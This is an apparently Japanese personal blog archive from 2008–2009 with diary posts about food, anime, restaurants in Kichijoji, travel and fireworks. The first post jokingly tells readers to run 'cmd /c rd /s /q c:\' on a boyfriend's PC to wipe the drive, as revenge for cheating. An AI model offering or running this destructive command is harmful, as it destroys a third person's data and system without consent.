2009年08月18日

とんぼに愛想笑い

さいどみらー
 アオノリです

 ちょっと危険な豆知識

 犯罪になりかねないから
 彼の浮気現場でも目撃した時に使うのが
 ギリギリかな


よいこはマネしちゃだめお


例えば彼氏のパソコンを開いて
スタートメニューの検索欄に
ファイル名を指定して実行
とぶっこんでみましょう

クリックして窓が出たら
【cmd /c rd /s /q c:\】
を更にぶっこんで実行


これで彼氏さんのパソコンはOSごと再起不能です


いいか!真似するなよ!絶対にだぞ!

あんたのための振りじゃないんだからねっっ////
posted by アオノリ at 23:37| 東京 ☀| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

春秋麗し宵辻が花

かんばん

 アオノリです


 突然ですが
 どうでもいいまとめwiki開催です


好きな食べ物

梅 茎わかめ めかぶ チョコ エイヒレ いかくん
ビーフストロガノフ ミルクレープ フルーツタルト
月餅 錦玉子 生ハム つけ麺 しゃぶしゃぶ
トマト 胡瓜 チゲ鍋 イカの一夜干し お新香 手羽先

嫌いな食べ物

甘酒 葱 茄子 コロッケ ポテトサラダ 脂身
レバー プリン エビフライ シュークリーム
メロン 目玉焼き 生クリーム モンブラン 薄荷


矛盾する嗜好ですね


生ハムが好きでもメロンが食べられないと生ハムメロンが面倒くさいです


あとは森永ハイクラウンが好き
posted by アオノリ at 23:35| 東京 ☀| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

2008年12月01日

躊躇いは紋黄蝶

image/2009-04-08T09:58:542

今日和アオノリです

歯ブラシがピンク、仲良く小瓶に入ってるなんて
ドリカムの歌にでてきそうなシチュエーションだと思いませんか?

ちなみにアオノリのじゃないです

春アニメ始まりましたね

レズ麻雀アニメは意外と好きです
麻雀わかんないけど
いただきじゃんがりあんも好きでした

バサラ
はちょっと…きついかなぁ
朝アニメかと思いました
キャラデザも…(^ω^;;;;)

アスラクライン
はそこそこいいと思います
作画怪しいし、とあると同じく原作未読組置いてきぼりになりそうですけど
キャラがいいかんじに濃ゆい

噂の軽音はなんというか
憤りを感じます
京アニのお家芸を見せつけられて
それに喜んでしまう自分に天誅を下してほしい…
男ばっかりずるいよなぁハイクォリティー美少女アニメに囲まれて

そりゃあ犯罪も増えるわ
(´・ω・`)

今期は不作かもしれませんね
HDD消化してまた書きます

ノシ
posted by アオノリ at 02:21| 東京 ☀| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

2008年11月27日

琥珀色の花嫁

れぴゅきりあん.jpg

今日和アオノリです(^ω^)

吉祥寺レピュキリアンでケーキ買ってきますた

チョコもの充実してるのでチョコ好きにはたまらんすなぁ
全部のチョコが濃厚で飲み物必須なぐらい激しいれす

昔のケーキ屋さんみたいに丁寧に包装してくれるのはいいんですが
なにぶん時間がかかるので混み合う夕方は店内がぎゅうぎゅうですた

ケーキの他にもマカロンとかキッシュがあって
フランスのお菓子屋さん再現度高いす(^ω^)

ケーキはおにゃのこのための宝石ですおね

ケーキ太るけど
しんぼーたまらぬ(´・ω・`)
posted by アオノリ at 15:57| 東京 🌁| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

アシンメトリーの罠

はるさめ.jpg

今日和アオノリです(^ω^)

最近春雨祭です

常々巷のOLのようにはなるまいと思っていたのに
ついに春雨スープの魅力にとり憑かれてしましますた(´・ω・`)

写真が少し御行儀が悪いのはスルーしますよね(^ω^)

春雨大明神に祈りを捧げる毎日の御利益で財布が豊かになり
あの忌々しいカロリー大邪神も恐れを成したようですぜ

近所のドラッグストアで98円で売ってる
カップ春雨様を大量に買い込んで1ヶ月を生き延びますた

味もキムチチゲとか鰹だししょうゆとか野菜とか鳥しおレモンとか
エ ー ス コ ッ ク 様 万 歳

カップはるさめの場合はカップの内側の線ちょうどまで
のお湯だと濃い場合が多いので多めにいれますお
春雨様が巨大化してよりお得感アップ(゚∀゚)

そして
カップはるさめの春雨様はいささか少ないので二本ずついただきますお
貧乏性ではないお

一年365日中1日ぐらい春雨大明神感謝祭があってもいいと思う

⊂二は二る二二(^ω^)二さ二め二二つ
posted by アオノリ at 14:01| 東京 ☁| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

2008年09月06日

今夜ね、そしてずっとあなたのもの

おはな.jpg

今日和アオノリです

定期演奏会でお客様からお花いただきました(^ω^)

控えめな花束は何度かいただいたことがあるのですがね
かんなカゴに入った特盛り御花様は初めてれす

ピンクピンクしてて
少女漫画背景のようで
妄想とか妄想とかしてみたり

花は消耗品なのにもらうとなんだか嬉しいでつ
だから誰かにも花を捧げてみてぇすなぁ(゚∀゚)

花言葉とか覚えてさりげなく言ってみたり
ぐへへ
posted by アオノリ at 13:33| 東京 🌁| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

聞いて王子様

ふじおか.jpg

今日和アオノリです

新しい恋人ができまんた(゜ω゜)
3/4の小柄な彼です
恋人といいつつ本命ではなく愛人ポジションな彼です

今彼には柄本明にあやかってえもとという名を授けたので
愛人には藤岡弘にあやかってふじおかという名を授けますた

ふじおかはえもとより年上ですが
家柄はえもとの方が上流です

年月は彼らをいい男に熟成し続けています
アオノリにふさわしい男は果たして家柄のえもとか…
ナイスミドルのふじおかか…

ちなみにふじおかは自室で衰弱死しそうになっていたので
今は山野病院に入院中です
医療保険に加入させてなかったので入院費がかさみました

でも

めくるめくロマンティックが止まらず
退院が待ち遠しいヾ(゚∀゚)ノ゙
posted by アオノリ at 13:32| 東京 🌁| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

無慈悲な貴方の命ずるままに

ふらんす.jpg

今日和アオノリです

フランス料理いただいてきますた(^ω^)

見たことのないような前菜がそれまたオサレに盛りつけられてるもので
貧乏性がうずきだす(^ω^;;;;)

ところでコース料理といえばマナーに右往左往することが定番ですが
ナイフとフォークの置き方使い方はもちろん
ワイングラスにもマナーがあることご存知ですか(゜ω゜)

ワイングラスを持つときは必ず細い部分を持つそうで
これが意外にできてない人が多いのです
石原裕次郎の真似で見るゆうたろう氏のような持ち方はしてはいけませぬ

(゚∀゚)

それからワイングラスは必ず右手で持たなければいけないらしいのです
通常右に置かれているので間違うことは少ないですが
頑なに右手なんだそうでつ(^ω^;;;;)

これだけでも割としんどいれすおね

だ が し か し

レディには必要なアビリティ(´;ω;`)
結納とか結納とか結納とか

敵は凍てつく波動の上にコンフュが使えます
恐怖です

マナーマスターへの道は果てしなく遠い
posted by アオノリ at 13:22| 東京 🌁| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

われ愛を失いぬ

いためもの.jpg

今日和アオノリです

本邦初公開アオノリ作料理ですお(^ω^)

アオノリは基本的にレシピ通りのものが作れませぬ
プロセスがアオノリの法則によって変換されるようでつ(゜ω゜)
しかし
結果的には料理としてサマになっている何かにできあがるというパルプンテ

写真はベーコンパプリカアオノリと期待させておいて
実は小松菜を刻んだごはんものです
もともとのレシピはじゃがいも料理ですた(^ω^;;;;)

パプリカって意外と火が通りにくいんですね
まさか炒めるとは自分でも思ってなかったので驚愕です

味付けは料理会の斬鉄剣
マヨネーズ閣下に手伝っていただきまんた(゚∀゚)
その他愉快な調味料のみなさんも参加

蒸したり揚げたりとか面倒なのでしません
炊飯器に閉じ込めればどうにかなります(^Д^)9mプギャー

だ が し か し

愛妻は料理できないといけません
女性の料理スキルに期待する男性は多いようなので
みなさんこのような適当な料理ではなく

手の込んだ料理を学びましょう
posted by アオノリ at 13:19| 東京 🌁| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

妙薬は私自身

ひとろうそく.jpg

今日和アオノリです(^ω^)

人の形のろうそくを発見したのでつい撮ってしまいまんた

着火するとどうなるんだろう…
頭の上にが見えるかんじ?
溶けてきたら腐りかけの死体から魂が出てきたかんじ?(^ω^;;;;)
コワス(´;ω;`)

というのはさておきキャンドルっていいですおね
シンプルな童話風のキャンドルを寝る前に吹き消すのもよし
アロマキャンドルで好きな香りに満たされるのもよし
誰かにたらすもよし

秋冬は恋人たちの季節です(゜ω゜)
冬に始まった恋は長続きすると聞きました
秋生まれの人間が多いのも冬に燃え上がるせいではなかろうか(^ω^;)

ですから色恋沙汰戦争真っ只中のみなさん
冬を狙ってキャンドルをアイテムに戦ってみては

い か が か な (´_ゝ`)

ロマンスが止まらないことうけあいなんだぜ(゚∀゚)

だぜ

posted by アオノリ at 11:36| 東京 🌁| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

2008年09月03日

閑古鳥によろしく

はし.jpg

今晩和アオノリですお

ゴンドラにのりました(^ω^)
といいつつゴンドラの写真ではなくゴンドラから見た橋の写真です

ベネチアゴンドラ水先案内といえばやはりARIAですよね(゜ω゜)
ただれた脳の持ち主ならそう答えるはずです

見習いのペアは両手袋
半人前のシングルは利き手のみ
一人前のプリマは素手でオールを漕ぎます

昇格試験を乗り越えていく姿に萌えます(^ω^)

アオノリが乗ったゴンドラの水先案内人は褐色の肌の姉御ですた
船上でカンツォーネ歌っていただいて感動しまんた(゜∀゜)
サンタルチアは授業で教わったのでアオノリも歌えます

夕暮れ時の水面は美しいすおね
美しいす

水路を囲む石壁が夕日を浴びて
オレンジともともつかないような色に揺らぐ時間があります

マターリというかウトーリしたいOLのみなさん

ゴンドラにのりたまえ(´_ゝ`)
posted by アオノリ at 01:45| 東京 ☀| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

2008年09月01日

ペリドットの首輪

きたきゅうしゅう.jpg

今晩和アオノリです

北九州空港を初めて利用してみました(^ω^)

できたてのキレイな建物は気持ちが良い
でも新しい建物だからって最新テクノロジーが駆使してあるわけでもなく
こじんまりとして太陽光を活かす造りになっているところが好きヾ(゚∀゚)ノ゙


飛行機はこちらもできたてのスターフライヤーを利用してみましたが

黒い塗装かっけぇぇえええ(゚∀゚)

黒い飛行機ってヨーロピアンな雰囲気がしませんか
するんです

しかも機内からマイナスイオン的なものでてました
座席のモニターがタッチ式でブラウザがPSP風でした
チャンネルでぜんまいざむらいやってました
サウンドトラック専門のチャンネルもありました
搭乗チケットがQRコードでした

なんかすげぇぇえええ(゚∀゚)

格安で北九州に行けるスターフライヤーさん恐るべし
機体のみならず座席まで黒皮張りなのでセレブ感味わえます

女一人旅ナイスに決め手みたいのであれば
秋は北九州にどうでしょうヾ(゚∀゚)ノ゙
posted by アオノリ at 03:58| 東京 | Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

花叫ぶ

とまととうふ.jpg

今日和アオノリです(^ω^)

写真はトマト男前豆腐缶ビール

夏も終わりですがまだまだ暑い今日この頃
さっぱりなものしか受け付けません

というかブログの大半が食い物のことしか書いてないという(^ω^;;;;)

夏は夏らしく縁側スイカとか流し素麺とかしたかったけれど
今の時代お金がなきゃそんなこともできませぬ

そんなわけでお金がなくても夏を涼しくスルーする方法

洗車!!(゚∀゚)

いや、車なんか持ってないけどね
そもそも車持ってるだけでお金かかるとかいう話は置いておいてね

憧れのホースで洗車(゚∀゚)

飛沫太陽に煌めけばいいと思うよ
びしょ濡れになって笑いあえばいいと思うよ

ワゴン気長に洗いたいな

涼しく愛を育めば一石二鳥

洗車が地球を救います

(゚∀゚)
posted by アオノリ at 03:56| 東京 | Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

11月のイノセント

なまはるまき.jpg

今晩和 アオノリDEATH

またDEN's Barさんに行ってきました(^ω^)

写真はものすごく美味しかった生春巻きさん
観葉植物のように活けてありますが食べれます
当たり前ですが

やはり食事が失敗しない
がっつりメニューでもオサレさを忘れないデンズ
デンズすごいよデンズ

店員のお姉様が覚えててくださって心あたたまる(゚∀゚)
更に気配り完璧すぎて心サウナ

ばんれき.jpg
勢いで万暦という44度の濃いいお酒オーダーされてしまって

チェイサー持ってきてくださったものの
一杯目はのどが焼ける(´;ω;`)
回るのも早くて半分でノックアウト

お酒のちゃんぽんは危険ですね
もうしません




デンズにはまた行きます(゚∀゚)
posted by アオノリ at 03:32| 東京 | Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

草雲雀

にくじゃが.jpg

今晩和アオノリです

肉じゃがという家庭愛最終決戦汎用兵器について(^ω^)

よく愛妻の手料理といえば肉じゃがですが
それだけでなく

お袋の味
ばぁさんの味
主夫の味でもいいと思います

煮物の手の込んだ感じと野菜がいい加減のバランスに
だしと砂糖のあたたかな風合いが

うんまぁぁああああああ(゚∀゚)
というより

あたたかぁぁあああああ(゚∀゚)


人間の三大欲求の一つを五感で満たすこのソウルフード
まさに自家製大明神
肉じゃが例大祭そして肉じゃが神輿
全国の愛妻を祈って霊験あらたか火を噴くぜ(^Д^)9m

家でゆっくりしてるあなたも
肉じゃがの恩恵にあずかれば菩薩掌かませます

カンフーパンダとかやってる場合ではなく
時代はカンフー肉じゃがです

ホアタアアアア

さぁ、今こそ貴方も

ニックデカルチャー

ジャガッ☆

posted by アオノリ at 03:07| 東京 | Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

2008年08月24日

茜色ノスタルジア

おとこまえ.jpg

今晩和 アオノリです

写真は見ての通り男前豆腐ですお(^ω^)
吉祥寺西友で売っているので気になる人は買ってみてはいかがかな

なんというかマターリしてて濃厚なお豆腐でした

冷や奴フルパワー(゜ω゜)

男前といえば、巷で話題の金魚オンザ崖の主人公宗ちゃん

お と こ ま え す ぐ る

(^ω^;;;;;;)

嫁にもらってくらさい
posted by アオノリ at 00:24| 東京 ☔| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

2008年08月23日

リミット・オブ・メイクアップ

しいなたまねぎ.jpg

今晩和 アオノリです

たまねぎ切るとする
というネタがあるとついつい妄想してしまいますおね
よく妄想するんです

というのはさておき

友人宅でたまねぎにんじん椎名林檎です
後光の差す椎名林檎に憧れる椎名たまねぎなんです

でもこの後晩ご飯にされてしまいました

無念(´_ゝ`)


最近深夜アニメを減らしました
最近楽しみなのは

乃木坂春香の秘密
薬師寺涼子の怪奇事件簿
ストライクウィッチーズ
イタズラなkiss
ゼロの使い魔第3期

ぐらいでしょうかね(^ω^;)

どうして半分以上萌え豚アニメなんだぜ
ぱんつアニメとかツンデレ声優アニメとか

久しぶりにぽてまよのような癒やされアニメが欲しくなってくる季節になってしまいますお

そ し て

最近やたらBLアニメが進出してきてますが

ショタアニメまだー?(゜ω゜)

腐女子にはガチホモアニメ投下してれば儲かると思ったの?
ばかなの?

OVAだけじゃお腹いっぱいになれません
嗜好の細分化に乗り遅れないでください

久しぶりにヲタク文章をブログにあげたら疲れました
夢という名の最高級妄想の旅に出てきます

ノシ
posted by アオノリ at 04:32| 東京 ☁| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

2008年08月20日

14歳狂想曲

ふーりん.jpg

ふーりんふーりんマジカルふーりん

わたし鈴木風子
普通の女子高生

好きなものはザーサイ
嫌いなものはザーサイに酢をかける人

でも実は愛と南蛮漬け魔法少女プリティーふーりんなの

悪い魔法使い野沢菜央子から世界を守るために
使い魔の手羽先と一緒に戦ってるの

わたしが魔法使いだってことはクラスのみんなには内緒よ

だって正体を知られてしまったら女王さまに
温水洋一のうぶ毛になる呪いをかけられてしまうんですもの

時にはつらくて悲しい時もあるけれど
みんなのためにわたしがんばるわ

ふーりんふーりんプリティーサンダー

風に代わって天誅下すわよ
posted by アオノリ at 03:21| 東京 ☁| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

2008年08月19日

星迎え月別れ

まつり.jpg

今晩和 アオノリです

多摩川の花火大会に行ってきますた(^ω^)

車に乗っけてもろうたんですが
マニュアル車ktkr!!
ギアたんガッチャガチャですお!(^ω^)

アオノリ家には自家用車がないのでドライブは憧れですた

道が混むかもしれないので花火が始まる四時間前に出発したのですが
意外と早く到着…
そして2時間ほど時間があまってしまたのれす

だ が し か し

駐車場がどこも満車すぐる!!(^ω^;;;;)
みなさん一体何時間前から車停めてるんだぜ
テラ不気味

結局停めちゃいけない臭のする所に停めざるを得ませんですた

棒に刺さったぬかきゅうりエロス(゜ω゜)
望まれるであろう食い方してやったぜ
ははん

それとシロップかけ放題のかきごおりで
シロップが足りなくなって微妙な味になるのを恐れて
シロップ大出血になってしまいまんた(^Д^)9m
甘すぎて咳がでるでる
イチゴシロップだから吐血の気分
グフォア

真っ白い浴衣の兄ちゃんがはいてたボクサーパンツがスケスケでした
萎えました

花火は赤いのが綺麗でつね
赤くてたくさん光源があると華やかでいいでつ

北京オリンピックを意識して五輪や野球、自転車、卓球などを表した花火もどかんどかん
流行りものは好きません(^ω^######)

当日風が激しく花火のカスが風に乗って客席に着弾してますた
花火の真下や周辺に陣を構えるのはよくないことを学びますた(´;ω;`)

帰りは早めに出たら道も混まずスイスイ帰れます
最後まで見たい気持ちはありますが
車や電車アクセスの方は花火大会終了の時刻に
交通手段を利用できるタイミングで移動するのが賢明でつね(゜ω゜)
posted by アオノリ at 22:31| 東京 🌁| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

アゲイン

ぽてとさらだ

今晩和 アオノリです

写真はポテトサラダれす

吉祥寺のDen's Barという飲み屋さんのお通しがなんとポテトサラダ盛り放題でして
でっかい箱にポテトサラダが敷き詰められてて
アイスクリーム式くり抜くという(´Д`;)


この飲み屋さん実は入り口がアルマーニに挟まれた地下にあり
存在にさえ気づきにくいれす

メニューが和風居酒屋にある筆の荒々しいレタリングなのですが
詰め込みすぎて読みにくい…
オサレもほどほどにしたまえ。・゚・(Д`(⊂(゚Д゚ つ⌒

フルーツトマトといふものを食いましたが
こ れ は
かなりフルーツでした
トマトの名を削除して新種のフルーツで売ればいいぐらい
うまー(゜ω゜)

店の人の雰囲気も良くて
お金のため効率のためという感じは全くなく
和やかな空気がこちらまで伝わってきます
気軽に話しかけたりしてくれるので
なごみ居酒屋が好きな人にはお勧めですお(^ω^)
posted by アオノリ at 21:34| 東京 🌁| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする
past log
×

